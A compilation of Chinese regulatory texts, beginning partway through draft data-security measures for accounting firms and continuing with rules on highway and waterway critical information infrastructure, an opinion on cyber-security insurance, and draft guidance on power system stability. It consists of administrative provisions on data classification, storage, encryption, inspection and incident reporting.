第九条会计师事务所应当按照相关法律法规的规定和被审计单位所处行业数据分级分类标准确定核心数据、重要数据和一般数据。 会计师事务所应当通过业务约定书等方式与被审计单位明确审计资料分级分类要求,审计资料分级分类的要求应当与被审计单位相关资料分级分类的要求保持一致。 第十条针对核心数据,会计师事务所应当建立核心数据保护机制,通过专用服务器或者会计师事务所私有云平台设置内部专门空间存储,使用加密虚拟专用网络等技术手段传输,对核心数据的存储、读取、转移应当建立授权与记录机制并保证有效运行。 针对重要数据,会计师事务所应当制定和执行规范的处理流程,将其存放于和互联网逻辑隔离的信息系统中,并严格控制接触人员范围。 针对一般数据,会计师事务所应当采取基于用户角色的授权访问控制,并且按照最小权限原则授权。 第十一条会计师事务所的审计工作底稿及相关数据应当存储在境内,不得在境外备份。 会计师事务所应当对审计业务相关的信息系统、数据库、网络设备、网络安全设备等设置并启用访问日志记录功能。日志应当存放境内,其中,日志中的用户登录及访问日志保存期限不得少于十年,其他日志保存期限不得少于六个月。 第十二条会计师事务所应当明确数据传输操作规程。核心数据、重要数据传输过程中应当采用加密技术,保护传输安全。 第十三条审计工作底稿和相关数据的加密设备应当设置在境内并由境内团队负责运行维护,密钥应当存储在境内。 第十四条会计师事务所应当建立数据备份制度。会计师事务所应当确保在审计相关应用系统停止使用、被限制使用等情况下,仍能访问、调取、使用相关审计工作底稿。 第十五条会计师事务所不得在业务约定书或类似合同中包含会计师事务所向境外监管机构提供境内项目资料数据等类似条款。 第十六条会计师事务所应当采用网络隔离、用户认证、访问控制、数据加密、病毒防范、非法入侵检测等技术手段,及时识别、阻断和溯源相关网络攻击和非法访问,保障数据安全。 第十七条会计师事务所应当建立数据安全应急处置机制,加强数据安全风险监测。发现数据外泄、安全漏洞等风险的,应当立即采取补救、处置措施。发生重大数据安全事件的,应当及时向省级以上财政部门报告。 第十八条会计师事务所在境内形成的审计工作底稿应当存放在境内。需要出境的,按照国家有关规定办理审批手续。 第十九条会计师事务所对于审计工作底稿出境事项应当建立逐级复核机制,采取必要措施严格落实审计工作底稿涉密敏感信息管控责任。 第三章 网络管理 第二十条会计师事务所应当建立完善的网络管理治理架构,建立健全内部网络管理制度体系,建立内部决策、管理、执行和监督机制,确保网络管理能力与提供的专业服务相适应,为数据安全管理工作提供安全的网络环境。 第二十一条会计师事务所应当按照业务活动规模及复杂程度配置具备相关职业技能水平的网络管理技术人员,确保合理的网络资源投入和资金投入。 第二十二条会计师事务所应当做好信息系统安全管理和技术防护,根据存储、处理数据的级别采取相应的网络物理隔离或者逻辑隔离等措施,设置严格的访问控制策略,防范未经授权的访问行为。 第二十三条会计师事务所应当拥有其使用的审计业务系统中网络设备、网络安全设备的配置和管理的最高权限,统一管理、维护系统管理员账户和工作人员账户,不得设置不受限制的超级账户。 加入国际网络的会计师事务所使用所在国际网络的信息系统的,应当采取用户隔离和数据隔离等措施。 第四章 监督检查 第二十四条省级以上财政部门与同级网信部门加强会计师事务所数据安全监管信息共享。 第二十五条省级以上财政部门、省级以上网信部门(以下简称相关部门)对会计师事务所数据安全情况开展监督检查。 在监督检查过程中,相关部门可以委托国家、行业有关专业机构采用渗透测试、漏洞扫描及信息技术风险评估等方式,协助对会计师事务所开展监督检查。 相关部门和机构工作人员对监督检查中知悉的核心数据、重要数据、个人隐私等数据应当依法严格保护,不得泄露或者非法向他人提供。 第二十六条对于承接金融、能源、通信、交通、科技、国防科工等重要领域审计业务的会计师事务所,相关部门应当开展全覆盖监督检查,并持续加强日常监管。 第二十七条会计师事务所对于相关部门依法实施的数据安全检查,应当予以配合,提供符合要求的相关数据资料和工作便利,不得拒绝、拖延、阻挠。 第二十八条承接关系国计民生、重要领域审计业务的会计师事务所开展数据处理活动,影响或者可能影响国家安全的,按照网络安全审查相关机制进行网络安全审查。 第二十九条相关部门在履行数据安全监管职责中,发现会计师事务所开展数据处理活动存在较大安全风险的,可以对会计师事务所及其责任人采取约谈、责令限期整改等监管措施,消除隐患。 第三十条会计师事务所及其从业人员违反本办法规定的,由相关部门依照《中华人民共和国数据安全法》、《中华人民共和国网络安全法》、《中华人民共和国注册会计师法》等法律、行政法规的规定进行处理处罚。 第三十一条对会计师事务所及其从业人员违反本办法规定,涉及其他部门职责权限的,依法移送有关主管部门处理;构成犯罪的,移送司法机关依法追究刑事责任。 第五章 附则 第三十二条会计师事务所及其从业人员开展涉及国家秘密的数据处理活动,适用《中华人民共和国保守国家秘密法》等法律、行政法规的规定。 第三十三条会计师事务所开展涉及个人信息的数据处理活动,应当遵守有关法律、行政法规的规定。 第三十四条会计师事务所的非审计业务数据管理可参照本办法执行。 第三十五条本办法由财政部、国家网信办负责解释。 第三十六条本办法自 年 月 日起施行。
standards
公路水路关键信息基础设施安全保护管理办法 (2023年4月24日交通运输部令2023年第4号公布 自2023年6月1日起施行) 第一章 总 则 第一条 为了保障公路水路关键信息基础设施安全,维护网络安全,根据《中华人民共和国网络安全法》《关键信息基础设施安全保护条例》等法律、行政法规,制定本办法。 第二条 公路水路关键信息基础设施的安全保护和监督管理工作,适用本办法。 前款所称公路水路关键信息基础设施是指在公路水路领域,一旦遭到破坏、丧失功能或者数据泄露,可能严重危害国家安全、国计民生和公共利益的重要网络设施、信息系统等。 第三条 交通运输部负责全国公路水路关键信息基础设施安全保护和监督管理。对在全国范围运营以及其他经交通运输部评估明确由部管理的公路水路关键信息基础设施(以下统称部级设施),由交通运输部具体实施安全保护和监督管理工作。 省级人民政府交通运输主管部门按照职责对本行政区域内运营的公路水路关键信息基础设施(以下统称省级设施)具体实施安全保护和监督管理。 交通运输部和省级人民政府交通运输主管部门以下统称交通运输主管部门。 第四条 公路水路关键信息基础设施安全保护坚持强化和落实公路水路关键信息基础设施运营者(以下简称运营者)主体责任,加强和规范交通运输主管部门监督管理,充分发挥社会各方面的作用,共同保护公路水路关键信息基础设施安全。 第五条 任何个人和组织不得实施非法侵入、干扰、破坏公路水路关键信息基础设施的活动,不得危害公路水路关键信息基础设施安全。 第二章 公路水路关键信息基础设施认定 第六条 交通运输部负责制定和修改公路水路关键信息基础设施认定规则,并报国务院公安部门备案。 制定和修改认定规则应当主要考虑下列因素: (一)网络设施、信息系统等对于公路水路关键核心业务的重要程度; (二)网络设施、信息系统等是否存储处理国家核心数据,以及网络设施、信息系统等一旦遭到破坏、丧失功能或者数据泄露可能带来的危害程度; (三)对其他行业和领域的关联性影响。 第七条 交通运输部根据认定规则负责组织认定公路水路关键信息基础设施,形成公路水路关键信息基础设施清单,及时将认定结果通知运营者,并通报国务院公安部门。 第八条 公路水路关键信息基础设施发生改建、扩建、运营者变更等较大变化,可能影响其认定结果的,运营者应当及时将相关情况报告交通运输部。交通运输部自收到报告之日起3个月内完成重新认定,更新公路水路关键信息基础设施清单,并通报国务院公安部门。 第九条 省级人民政府交通运输主管部门应当按照交通运输部的相关要求,负责组织筛选识别省级行政区域内运营的公路水路关键信息基础设施待认定对象,并研究提出初步认定意见报交通运输部。 交通运输部应当将认定结果通知省级人民政府交通运输主管部门。 第三章 运营者责任义务 第十条 新建、改建、扩建或者升级改造公路水路关键信息基础设施的,安全保护措施应当与公路水路关键信息基础设施同步规划、同步建设、同步使用。 运营者应当按照国家有关规定对安全保护措施予以验证。 第十一条 运营者应当建立健全网络安全保护制度和责任制,保障人力、财力、物力投入。运营者的主要负责人对公路水路关键信息基础设施安全保护负总责,领导关键信息基础设施安全保护和重大网络安全事件处置工作,组织研究解决重大网络安全问题。 运营者应当明确管理本单位公路水路关键信息基础设施安全保护工作的具体负责人。 第十二条 运营者应当设置专门安全管理机构,明确负责人和关键岗位人员并进行安全背景审查和安全技能培训,符合要求的人员方能上岗。鼓励网络安全专门人才从事公路水路关键信息基础设施安全保护工作。 运营者应当保障专门安全管理机构的人员配备,开展与网络安全和信息化有关的决策应当有专门安全管理机构人员参与。 专门安全管理机构的负责人和关键岗位人员的身份、安全背景等发生变化或者必要时,运营者应当重新进行安全背景审查。 第十三条 运营者应当保障专门安全管理机构的运行经费,并依法依规严格规范经费使用和管理,防止资金挤占挪用。 重要网络设施和安全设备达到使用期限的,运营者应当优先保障设施设备更新经费。 第十四条 运营者应当加强公路水路关键信息基础设施供应链安全管理,应当采购依法通过检测认证的网络关键设备和网络安全专用产品,优先采购安全可信的网络产品和服务;采购网络产品和服务可能影响国家安全的,应当按照国家网络安全规定通过安全审查。 鼓励运营者从已通过云计算服务安全评估的云计算服务平台中采购云计算服务。 第十五条 运营者应当加强公路水路关键信息基础设施个人信息和数据安全保护,将在我国境内运营中收集和产生的个人信息和重要数据存储在境内。因业务需要,确需向境外提供数据的,应当按照国家相关规定进行安全评估;法律、行政法规另有规定的,依照其规定执行。 第十六条 公路水路关键信息基础设施的网络安全保护等级应当不低于第三级。 运营者应当在网络安全等级保护的基础上,对公路水路关键信息基础设施实行重点保护,采取技术保护措施和其他必要措施,应对网络安全事件,防范网络攻击和违法犯罪活动,保障公路水路关键信息基础设施安全稳定运行,维护数据的完整性、保密性和可用性。 第十七条 运营者应当自行或者委托网络安全服务机构对公路水路关键信息基础设施每年至少进行一次网络安全检测和风险评估,对发现的安全问题及时整改。部级设施的运营者应当直接向交通运输部报送相关情况;省级设施的运营者应当将相关情况报经省级人民政府交通运输主管部门审核后报送交通运输部。 第十八条 法律、行政法规和国家有关规定要求使用商用密码进行保护的公路水路关键信息基础设施,其运营者应当使用商用密码进行保护,自行或者委托商用密码检测机构每年至少开展一次商用密码应用安全性评估。 商用密码应用安全性评估应当与公路水路关键信息基础设施安全检测评估、网络安全等级测评制度相衔接,避免重复评估、测评。 第十九条 运营者应当加强保密管理,按照国家有关规定与网络产品和服务提供者等必要人员签订安全保密协议,明确提供者等必要人员的技术支持和安全保密义务与责任,并对义务与责任履行情况进行监督。 第二十条 运营者应当制定网络安全教育培训制度,定期开展网络安全教育培训和技能考核。教育培训的具体内容和学时应当遵守国家有关规定。 第二十一条 运营者应当建设本单位网络安全监测系统,对公路水路关键信息基础设施开展全天候监测和值班值守。 运营者应当加强本单位网络安全信息通报预警力量建设,依托国家网络与信息安全信息通报机制,及时收集、汇总、分析各方网络安全信息,组织开展网络安全威胁分析和态势研判,及时通报预警和处置。 第二十二条 运营者应当按照国家有关要求制定网络安全事件应急预案,建立网络安全事件应急处置机制,加强应急力量建设和应急资源储备,每年至少开展一次应急演练,并针对应急演练发现的突出问题和漏洞隐患,及时整改加固,完善保护措施。 第二十三条 部级设施发生重大网络安全事件或者发现重大网络安全威胁时,运营者应当直接向交通运输部、公安机关报告,并立即启动本单位网络安全事件应急预案。 省级设施发生重大网络安全事件或者发现重大网络安全威胁时,运营者应当立即向省级人民政府交通运输主管部门、公安机关报告,并启动本单位网络安全事件应急预案。省级人民政府交通运输主管部门应当将相关情况及时报告交通运输部。 公路水路关键信息基础设施发生特别重大网络安全事件或者发现特别重大网络安全威胁时,交通运输部应当在收到报告后,及时向国家网信部门、国务院公安部门报告。 第四章 保障和监督 第二十四条 交通运输部应当制定公路水路关键信息基础设施安全规划,明确保护目标、基本要求、工作任务、具体措施。 交通运输主管部门、运营者应当严格落实公路水路关键信息基础设施安全规划。 第二十五条 交通运输部应当建立公路水路关键信息基础设施网络安全监测预警制度,充分利用网络安全信息共享机制,及时掌握公路水路关键信息基础设施运行状况、安全态势,预警通报网络安全威胁和隐患,指导做好安全防范工作。 省级人民政府交通运输主管部门应当及时掌握省级设施的运行状况、安全态势,并组织做好预警通报和安全防范工作。 第二十六条 交通运输部应当按照国家网络安全事件应急预案的要求,建立健全公路水路网络安全事件应急预案,定期组织应急演练;指导运营者做好网络安全事件应对处置,并根据需要组织提供技术支持与协助。 省级人民政府交通运输主管部门应当依据前款规定组织做好本行政区域内公路水路网络安全事件应急预案、应急演练相关工作,并将应急预案、应急演练情况及时报告交通运输部。省级人民政府交通运输主管部门应当指导省级设施运营者做好网络安全事件应对处置,并根据需要组织提供技术支持与协助。 第二十七条 交通运输主管部门应当定期组织开展公路水路关键信息基础设施网络安全检查检测,指导监督运营者建立问题台账,制定整改方案,及时整改安全隐患、完善安全措施。省级人民政府交通运输主管部门应当将检查检测情况及时报告交通运输部。 公路水路关键信息基础设施网络安全检查检测应当在国家网信部门的统筹协调下开展,避免不必要的检查和交叉重复检查。检查工作不得收取费用,不得要求被检查单位购买指定品牌或者指定生产、销售单位的产品和服务。 第二十八条 运营者对交通运输主管部门开展的网络安全检查检测工作,以及公安、国家安全、保密行政管理、密码管理等有关部门依法开展的公路水路关键信息基础设施网络安全检查工作应当予以配合,并如实提供网络安全管理制度、重要资产清单、网络日志等必要的资料。 第二十九条 交通运输主管部门按照国家有关规定,对网络安全工作不力、重大安全问题隐患久拖不改,或者存在重大网络安全风险、发生重大网络安全事件的运营者,约谈单位负责人,并加大网络安全监督检查力度。 第三十条 交通运输主管部门、网络安全服务机构及其工作人员对于在公路水路关键信息基础设施安全保护过程中获取的信息,只能用于维护网络安全,并严格按照有关法律、行政法规的要求确保信息安全,不得泄露、出售或者非法向他人提供。 第五章 法律责任 第三十一条 运营者违反本办法规定的,由交通运输主管部门按照《关键信息基础设施安全保护条例》等法律、行政法规的规定予以处罚。 第三十二条 交通运输主管部门及其工作人员存在以下情形之一的,按照《关键信息基础设施安全保护条例》等法律、行政法规的规定予以处分: (一)未履行公路水路关键信息基础设施安全保护和监督管理职责或者玩忽职守、滥用职权、徇私舞弊的; (二)在开展公路水路关键信息基础设施网络安全检查工作中收取费用,或者要求被检查单位购买指定品牌或者指定生产、销售单位的产品和服务的; (三)将在公路水路关键信息基础设施安全保护工作中获取的信息用于其他用途,或者泄露、出售、非法向他人提供的。 第六章 附 则 第三十三条 本办法自2023年6月1日起施行。
standards
工业和信息化部 国家金融监督管理总局关于促进网络安全保险规范健康发展的意见 工信部联网安 [2023] 95号 各省、自治区、直辖市及计划单列市、新疆生产建设兵团工业和信息化主管部门,各银保监局,各相关单位: 网络安全保险是为网络安全风险提供保险保障的新兴险种,日益成为转移、防范网络安全风险的重要工具,在推进网络安全社会化服务体系建设中发挥着重要作用。为深入贯彻《中华人民共和国网络安全法》《中华人民共和国数据安全法》等相关法律法规,加快推动网络安全产业和金融服务融合创新,引导网络安全保险健康有序发展,培育网络安全保险新业态,促进企业加强网络安全风险管理,推动网络安全产业高质量发展,现提出如下意见。 一、建立健全网络安全保险政策标准体系 (一)完善网络安全保险政策制度。加强网络安全产业政策对网络安全保险的支持,推动网络安全技术服务赋能网络安全保险发展,引导关键信息基础设施保护、新兴融合领域网络安全保障等充分运用网络安全保险。加强保险业政策对网络安全保险的支持,指导网络安全保险创新发展,引导开发符合网络安全特点规律的保险产品。推动健全完善财政政策,充分利用地方首台(套)、首版(次)等现有政策,提供保险减税、保险购买补贴等措施。 (二)健全网络安全保险标准规范。支持网络安全产业和保险业加强合作,建立覆盖网络安全保险服务全生命周期的标准体系,统一行业术语规范,明确核保、承保、理赔等主要环节基本流程和通用要求。研究制定承保前重点行业领域网络安全风险量化评估相关标准,规范安全风险评估要求;承保中网络安全监测管理服务相关标准,规范监测预警方法;承保后理赔服务实施要求相关标准,规范网络安全保险售后服务。 二、加强网络安全保险产品服务创新 (三)丰富网络安全保险产品。鼓励保险公司面向不同行业场景的差异化网络安全风险管理需求,开发多元化网络安全保险产品。面向重点行业企业开发网络安全财产损失险、责任险和综合险等,提升企业网络安全风险应对能力。面向信息技术产品开发产品责任险,面向网络安全产品开发网络安全专门保险,为信息网络技术产品提供保险保障。面向网络安全服务开发职业责任险等产品,转移专业技术人员在安全服务过程中因人为操作可能引发的安全风险。 (四)创新发展网络安全保险服务。鼓励网络安全保险服务机构协同合作,探索构建以网络安全保险为核心的全流程网络安全风险管理解决方案。充分发挥保险机构专业优势,联合网络安全企业、基础电信运营商等加快网络安全保险与网络安全服务融合创新。充分发挥网络安全企业、专业网络安全测评机构技术优势,联合保险公司提升网络安全保险服务能力。 三、强化网络安全技术赋能保险发展 (五)开展网络安全风险量化评估。围绕电信和互联网行业典型事件以及工业互联网、车联网、物联网等新兴场景开展网络安全风险研究。探索建立网络安全风险量化评估模型,加强网络安全风险影响规模预测、经济损失等分析。支持网络安全企业、专业网络安全测评机构等研发网络安全风险量化评估技术,开发轻量化网络安全风险量化评估工具,鼓励保险机构建立网络安全风险理赔数据库,支撑网络安全风险精准定价。 (六)加强网络安全风险监测能力。开展网络安全保险全生命周期风险监测,覆盖事前、事中、事后等重要环节。鼓励网络安全企业、专业网络安全测评机构等充分发挥网络安全风险监测技术优势,充分利用安全技术手段,针对网络安全漏洞、恶意网络资源、网络安全事件等开展网络安全威胁实时监测,及时发现网络安全风险隐患,提升网络安全风险监测预警、应急处置等能力。 四、促进网络安全产业需求释放 (七)推广网络安全保险服务应用。面向电信和互联网、能源、金融、医疗卫生等重点行业,以及工业互联网、车联网、物联网等新兴融合领域,围绕网络安全与信息技术产品服务供给侧和需求侧两类主体,充分发挥网络安全产业、网络安全保险相关联盟协会等作用,开展网络安全保险服务试点,形成可复制、可推广的网络安全保险服务模式,促进网络安全保险推广应用。 (八)推动企业网络安全风险应对能力提升。鼓励重点行业企业完善网络安全风险管理机制,推动电信和互联网、制造业、能源、金融、交通、水利、教育等重点行业企业积极利用网络安全保险工具,有效转移、防范网络安全风险,提升网络基础设施、重要信息系统和数据的安全防护能力。支持中小企业通过网络安全保险服务监控风险敞口,建立健全网络安全风险管理体系,不断加强中小企业网络安全防护能力。 五、培育网络安全保险发展生态 (九)培育优质网络安全保险企业。鼓励网络安全企业、保险机构积极参与网络安全保险生态建设,开展网络安全保险优秀案例征集、网络安全保险应用示范等活动,培育一批专业能力突出的保险机构,发展一批技术支撑能力领先的网络安全企业、专业网络安全测评机构等,建设一批网络安全保险创新联合体,培育网络安全保险发展良性生态。 (十)宣传推广网络安全保险服务。充分发挥相关行业联盟协会、重点企业带动作用,整合资源优势,促进网络安全产业和金融服务要素流动,开展网络安全保险教育培训,引导加强从业人员自律,规范网络安全保险推广应用。用好网络和数据安全产业高峰论坛、网络安全技术应用试点示范等活动,宣传普及网络安全保险,举办网络安全保险主题活动,加强经验总结和交流推广,营造促进网络安全保险规范健康发展的浓厚氛围。 工业和信息化部 国家金融监督管理总局 2023年7月2日
standards
附件 关于加强新型电力系统稳定工作的指导意见 (征求意见稿) 为深入贯彻党的二十大精神,全面落实党中央、国务院决策部署,准确把握电力系统技术特性和发展规律,扎实做好新形势下电力系统稳定工作,保障电力安全可靠供应,推动实现碳达峰碳中和目标,提出以下意见。 一、充分认识做好电力系统稳定工作的重要意义 (一)稳定工作是电力系统健康发展的基础。电力系统稳定工作是以保障电力系统安全稳定运行为目标,统筹发输供用储各环节的系统性全局性综合性工作,是电力行业管理的重要内容,是实现电力行业健康发展、确保电力安全可靠供应的基础。在我国电力系统长期发展实践中,稳定工作始终立足我国能源基本国情,遵循电力行业发展客观规律,严格执行《电力系统安全稳定导则》等技术规定,不断筑牢“三道防线”,主动防范和化解各类系统风险,保障了电力系统稳定运行,为经济社会发展提供了坚强支撑。 (二)进一步加强稳定工作是构建新型电力系统的必然要求。未来相当长时间内,电力系统仍将维持以交流电为基础的技术形态,交流电力系统稳定问题将长期存在。随着我国能源电力绿色低碳转型的深入推进,新能源发电装机大幅增长,电力电子设备高比例接入,特高压交直流输电混联运行,电力系统生产结构、运行机理、功能形态等正在发生深刻变化,低惯量、低阻尼、弱电压支撑等问题凸显,电力供需失衡引发频率、电压等稳定问题的风险增加,故障形态及连锁反应路径更加复杂。新型电力系统安全稳定面临更加严峻的挑战,做好稳定工作事关全局、意义重大。 二、总体要求 (三)指导思想 以习近平新时代中国特色社会主义思想为指导,深入贯彻党的二十大精神,全面落实“双碳”战略部署和“四个革命、一个合作”能源安全新战略,牢固树立管电就要管系统、管系统就要管稳定的工作理念,立足我国国情,坚持底线思维、问题导向,坚持系统观念、守正创新,坚持先立后破、稳妥有序,统筹发展和安全,做好新型电力系统稳定工作,为中国式现代化建设提供可靠电力保障,满足人民美好生活用电需要。 (四)总体思路 ——夯实稳定物理基础。科学构建源网荷储结构与布局,保证电源结构合理和电网强度,建设充足的灵活调节能力和稳定控制资源,确保必要的惯量、短路容量、有功和无功支撑,满足电力系统电力电量平衡和安全稳定运行的需求。 ——强化稳定管理体系。围绕高比例可再生能源、高比例电力电子设备、源网荷储互动环境下的电力系统安全稳定运行,远近结合、科学谋划电力系统转型的发展方向和路径,统筹规划、建设、运行、市场、科研等各项工作,建立适应新型电力系统的稳定管理体系,确保稳定工作要求在新型电力系统全过程、全环节、全方位落实。 ——加强科技创新支撑。围绕系统安全稳定技术需求,加强基础理论研究,推进重大技术和装备攻关,加快先进技术示范和推广应用,协同构建适应新型电力系统的稳定技术标准体系,提升自主可控水平,以创新引领新型电力系统建设。 三、夯实新型电力系统稳定基础 (五)完善合理的电源结构。统筹各类电源规模和布局。可靠发电能力要满足电力电量平衡需要并留有合理裕度,为系统提供足够的调峰、调频、调压能力;科学确定电源接入电网电压等级,实现对各级电网的有效支撑;构建多元互补的综合能源供应体系。增强常规电源调节支撑能力。新建煤电机组全部实现灵活性制造,加快存量煤电机组灵活性改造,支持退役火电机组调相功能改造,不断提高机组涉网性能;积极推进水电站依法合规增容扩机,新建水电机组应具备调相功能;积极安全有序发展核电,适度布局调峰气电。大力提升新能源主动支撑能力。推动系统友好型电站建设,逐步实现新能源在电力供应和稳定支撑方面的可靠替代;协同推进大型新能源基地、调节支撑电源和外送通道开发建设,保障外送电力的连续性和稳定性。 (六)构建坚强柔性电网平台。明确网架构建原则。构建分层分区、结构清晰、安全可控、灵活高效的电网网架,合理确定同步电网规模;保证电网结构强度,保持必要的灵活性和冗余度,适应运行方式的灵活调整,具备与特高压直流、新能源规模相适应的抗扰动能力。提高直流送受端稳定水平。直流送端要合理分群,控制同送端、同受端直流输电规模,新增输电通道要避免过于集中;直流受端要优化落点布局,避免落点过于密集;常规直流受端和新能源高占比地区应具备足够的电压支撑能力,短路比等指标要符合要求;积极推动柔性直流技术应用。促进各级电网协调发展。合理控制短路电流水平,适时推动电网解环和电网柔性互联;推动建设分布式智能电网,统一开展稳定管理,实现与大电网的兼容互补和友好互动。 (七)深挖电力负荷侧灵活性。整合负荷侧需求响应资源。将微电网、分布式智能电网、虚拟电厂、电动汽车充电设施、用户侧源网荷储一体化聚合等纳入需求侧响应范围,推动可中断负荷、可控负荷参与稳定控制。完善负荷控制手段。建立完善市场化激励机制,明确各参与主体的市场地位,引导各类市场主体参与负荷控制建设和运营,创新负荷控制技术和方式;加快新型电力负荷管理系统建设,强化负荷分级分类管理和保障,实现负荷精准控制和用户精细化用能管理。强化负荷控制执行刚性。科学制定负荷控制方案,明确负荷控制的执行条件,对保障电网安全稳定运行的负荷控制措施,电网企业要严格执行,确保系统安全。 (八)科学安排储能建设。按需建设储能。根据电力系统需求,统筹各类调节资源建设,因地制宜推动各类型、多元化储能科学配置,形成多时间尺度、多应用场景的电力调节能力,更好保障电力系统安全稳定灵活运行,改善新能源出力特性和负荷特性,支撑高比例新能源外送。有序建设抽水蓄能。有序推进具备条件的抽水蓄能电站建设,探索常规水电改抽水蓄能和混合式抽水蓄能电站技术应用,新建抽水蓄能机组应具备调相功能。积极推进新型储能建设。充分发挥电化学储能、压缩空气储能、飞轮储能、氢储能、热(冷)储能等各类新型储能的优势,探索储能融合发展新场景,提升电力系统安全保障水平和系统综合效率。 四、加强新型电力系统全过程稳定管理 (九)加强电力系统规划。统筹整体规划。统筹源网荷储整体规划,加强规划方案及过渡期安全稳定和供电充裕性的系统性论证,提高规划阶段电力系统安全稳定计算分析深度和精度;加强新能源消纳和系统调节能力的统筹规划。滚动开展分析。滚动开展供需平衡分析,合理安排支撑性电源和调节性资源建设,保证电力供应和系统调节能力充裕。有序做好衔接。加强规划与运行的衔接,提升规划方案的适应性与安全性;加强一、二次系统的衔接,协调开展安全稳定控制系统的整体方案研究。 (十)加强工程前期设计。深化设计方案。在大型输变电工程、大型电源接入系统、直流输电工程的可行性研究及初步设计工作中,加强工程对系统的影响分析。开展差异化补强设计。针对重点区段开展差异化设计,提升工程可靠性和抵御灾害能力。优化二次系统设计。合理配置继电保护、稳定控制、通信、自动化等二次系统,确保满足相关标准和反事故措施要求。 (十一)加强电力装备管理。紧密围绕电力系统的稳定技术要求开展相关装备研制、系统试验。针对不同应用场景优化直流、新能源等电力电子装备的并网性能。严格把关电力装备入网质量,充分开展试验测试,消除装备质量系统性缺陷。对新研发的首台(套)电力装备,加强科学论证和风险管控。 (十二)加强电力建设管理。强化电力工程建设的施工、质量、进度等全周期管理,实现工程“零缺陷”投运。组织实施与基建工程配套的系统安全稳定控制措施,确保一次设备与相应的二次设备同步建设、同步投运。针对工程建设过渡阶段,开展系统分析校核,落实过渡期安全保障措施。 (十三)加强电力设备运维保障。加强大型电源和主网设备的可靠性管理,持续开展设备隐患排查和状态监测,针对重要输电通道、枢纽变电站、重要发电厂等关键电力设施开展专项运维保障。及时组织设备缺陷及故障原因分析,制定并落实反事故措施,定期核定设备过负荷能力。加强二次系统运维保障,确保二次设备状态和参数与一次系统匹配,防止安全自动装置不正确动作。 (十四)加强调度运行管理。严肃调度纪律。坚持统一调度、分级管理,各并网主体必须服从调度机构统一指挥,调度机构要严格按照相关法律法规和制度标准开展稳定管理工作;统筹安排电力系统运行方式,保证互联电力系统安全稳定控制措施的协同落实;在电力系统发生严重故障等情况下,调度机构应按照有关规定果断采取控制措施。强化协同控制。建立一、二次能源综合管理体系,加强电力电量全网统一平衡协调;提升新能源预测水平,严格开展各类电源涉网性能管理,通过源网荷储协同调度、跨省区输电通道送受端电网协同调度,提高面向高比例可再生能源接入的调度管控能力。优化调度方式。加强调度与市场衔接配合,推动调度生产组织向市场化方式转变;研究推动风光水(火)储一体化项目作为整体优化单元参与电力系统调节和市场交易;建立完善灵活调节性资源调度机制;定期优化有序用电方案、序位表和措施,确保符合最新电力供需形势。 (十五)加强电力市场管理。将提高电力系统安全稳定水平作为电力市场建设的重要目标之一,强化交易合同履约,完善中长期市场连续运营机制,加快建设更能体现灵活调节能力的现货市场。持续完善辅助服务市场,丰富调频、备用、转动惯量等辅助服务交易品种,建立健全基础保障性和系统调节性电源容量补偿机制。推动建立容量市场,激励支撑调节资源建设。完善电力市场交易安全稳定校核制度,强化市场化的电力市场风险应急处置机制,保证各类市场运作场景下电力系统稳定可控。 (十六)加强电力系统应急管理。建立健全应对极端天气和自然灾害的电力预警和应急响应机制,加强灾害预警预判和各方协调联动。强化重点区域电力安全保障,合理提高核心区域和重要用户的相关线路、变电站建设标准,推进本地应急保障电源建设,重要用户应根据要求配置自备应急电源,加强移动应急电源统筹调配使用,在重点城市建成坚强局部电网。加强超大、特大城市电力保供分析,确有必要的,保留一部分停机备用煤电机组,应对季节性保供。提升事故后快速恢复和应急处置能力,优化黑启动电源布局,完善各类专项应急预案,定期组织开展大面积停电事件应急演练。 (十七)加强电力监控系统安全防护。实施电力行业网络安全“明目”“赋能”“强基”行动,建立完善电力行业、企业网络安全态势感知和监测预警平台,提升电力行业网络安全攻防和应急能力。打造以仿真验证环境、密码平台和北斗设施为代表的电力行业网络安全共性基础能力支撑平台,加强信息资产、威胁情报管理基础能力,落实关键信息基础设施安全保护要求。深化电力监控系统安全防护体系,前瞻应对新型电力系统新业态新技术带来的网络安全新风险,筑牢电力行业网络安全基石。 五、构建稳定技术支撑体系 (十八)攻关新型电力系统稳定基础理论。研究高比例可再生能源、高比例电力电子设备接入电力系统的稳定机理,掌握电力系统故障暂态过渡过程,加快攻关源荷双侧高度不确定性环境下电力电量平衡理论,突破海量异构资源的广域协调控制理论。深入研究新型储能对电力系统安全稳定支撑作用,加快建立完善各类灵活调节性资源规划设计理论。 (十九)提升系统特性分析能力。推进电力系统多时间尺度仿真能力建设。在电力系统各环节深入开展仿真分析,研究标准化仿真模型,推动新能源发电机组参数开放共享,对高比例电力电子设备接入电网开展电磁暂态仿真校核,建立集中式新能源、新型储能、直流等详细仿真模型,开展含分布式电源的综合负荷模型建模。加强电力系统稳定特性分析。充分考虑运行工况的随机波动性,强化在线安全分析应用,充分利用实际故障和系统性试验开展研究,掌握系统安全稳定边界。 (二十)强化系统运行控制能力。融合先进信息通信技术,汇集一次能源、设备状态、用户侧资源、气象环境等各类信息,构建全网监视、全局分析、协同控制、智能决策、主配一体的调度技术支持系统,提高电力系统运行控制数字化水平,实现调度决策从自动化向智能化转变。提升新能源和配电网的可观、可测、可控能力,实现分布式电源、可控负荷的汇聚管理,同步加强网络安全管理。 (二十一)加强系统故障防御能力。巩固和完善电力系统安全防御“三道防线”,开发适应高度电力电子化系统的继电保护装置,研究针对宽频振荡等新型稳定问题的防御手段,扩展稳定控制资源池,滚动完善控制策略,加强安全自动装置状态和可用措施量的在线监视,保障电力电子化、配电网有源化环境下稳定控制措施的有效性。研究新能源高占比情形下发生极端天气时的电力系统稳定性措施。加强电力系统故障主动防御,提升全景全频段状态感知水平,实现风险预测、预判、预警和预控。 (二十二)加快重大电工装备研制。研发大容量断路器、大功率高性能电力电子器件、新能源主动支撑、大容量柔性直流输电等提升电力系统稳定水平的电工装备。推动新型储能技术向高安全、高效率、主动支撑方向发展。提高电力工控芯片、基础软件、关键材料和元器件的自主可控水平,强化电力产业链竞争力和抗风险能力。 (二十三)加快先进技术示范和推广应用。紧密围绕电力系统稳定核心技术、重大装备、关键材料和元器件等重点攻关方向,充分调动企业、高校及科研院所等各方面力量,因地制宜开展电力系统稳定先进技术和装备的示范,积累运行经验和数据,及时推广应用成熟适用技术,加快创新成果转化。 